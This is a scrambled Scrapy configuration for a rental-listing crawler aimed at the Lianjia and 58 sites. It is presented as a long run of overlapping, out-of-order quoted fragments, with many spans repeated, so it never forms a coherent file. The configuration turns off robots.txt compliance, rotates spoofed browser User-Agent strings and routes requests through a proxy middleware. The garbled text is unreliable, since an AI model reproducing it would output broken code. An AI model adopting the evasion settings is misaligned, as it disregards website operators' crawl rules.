COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders']", "Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR", "'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map,", "'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到", "Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0", "The average number of requests Scrapy should be sending in parallel to #", "in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of", "AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel 
Mac OS X", "USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET", "{ 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities':", "sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable", "SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS", "NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729;", "3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT", "可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ]", "Enable and configure the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED", "MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET", ".NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows", "CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET", "Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like", "en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1;", "7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC", "'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac", "lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } #", "'3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows", "287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) 
AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6',", "True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download", "rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0", "in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing", "= 10 # The average number of requests Scrapy should be sending in", "U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows", "'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 '", "The maximum download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY", "received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO'", "AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT", "'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0", "of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy", "SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows", "by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay", "WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729;", "CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET", "CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1;", "'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 
'house_renting.pipelines.ESPipeline':", "MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR", ".NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2;", "i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10", "parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling", "9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)',", "6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET", "-*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES", "= 2.0 # Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG =", "' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko)", "'/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension (disabled by", "# -*- coding: utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting'", "Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible;", "Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;", "= [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None,", "be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 #", "U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT", "' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)',", "6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET", "to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats", "rv:1.9) Gecko/20080705 Firefox/3.0 
Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11;", "en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705", "AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3)", "Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0", "{ 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images'", "Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729;", "X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac", "response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL =", "AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG", "'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware':", "(KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4)", "Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML,", "None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST =", "(compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322;", "'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, },", "'cities': lianjia.cities, 
'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities,", "AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;", "'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like", "(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727;", "PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild", "configure the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True", "= 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT =", "download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be set", "不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis'", "OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel", "(X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U;", "5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5',", "(Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel", "Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED", "'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS", "10 # The average number of requests Scrapy should be sending in parallel", "set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average 
number", "DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia':", "{'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT", "\\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;", "10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = (", "Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR", "CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT", "i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML,", "Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80", "U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change:", "(Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY =", "'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES =", "200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True #", "'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3", "'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable", "extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial", "'Safari/605.1.15', 'Opera/9.80 
(Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', )", "en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR", "= True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum", "200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100,", "= { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, }", "'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1", "Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15", "(X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1;", "'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows;", "'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729;", "(compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media", ".NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT", "'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11;", "server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every response received:", "initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be", "from house_renting.spider_settings import lianjia, a58 BOT_NAME = 
'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES =", "# The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay", "'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 '", "6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0", "utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands'", "NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac", "= False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = {", "like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U;", "TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES =", "Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center", "10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN", "(Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux", "U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN =", ".NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC", "K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0", "CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like", "SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 
'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300,", "number of requests Scrapy should be sending in parallel to # each remote", "c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0", "None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300,", "CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0", "BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT", "showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30", "Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1;", "True # Enable and configure the AutoThrottle extension (disabled by default) # See", "Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0", ".NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b;", "requests Scrapy should be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY", "Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like", "# Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT", "like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15", "1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR", "5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 
(compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35;", "# each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for", "and configure the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED =", "Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0;", "5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9)", "= { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': {", "'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727;", "average number of requests Scrapy should be sending in parallel to # each", "a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES", "'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, }", "= True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS =", "should be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0", "' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows", "import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE", "['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4)", "6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS", "10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS", ".NET CLR 2.0.50727; InfoPath.2; .NET 
CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT", "'.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT", "{ 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities':", "Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7", "'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;", "} SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware':", "REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379 # 默认 6379", "Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5;", "AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR '", "'3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3)", "like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML,", "(compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2;", "# The maximum download delay to be set in case of high latencies", "Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0;", "SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR", "节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200},", "'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh;", ".NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705;", "coding: utf-8 -*- from 
house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE =", "10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = {", "'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379", "2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0;", "'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100,", "'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities,", "(KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre)", "[ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重", "ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE", "U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT", "CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE", "(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET", "7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR", "Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows;", "x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media", "default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY", "} # ES 节点, 可以配置多个节点(集群), 默认为 
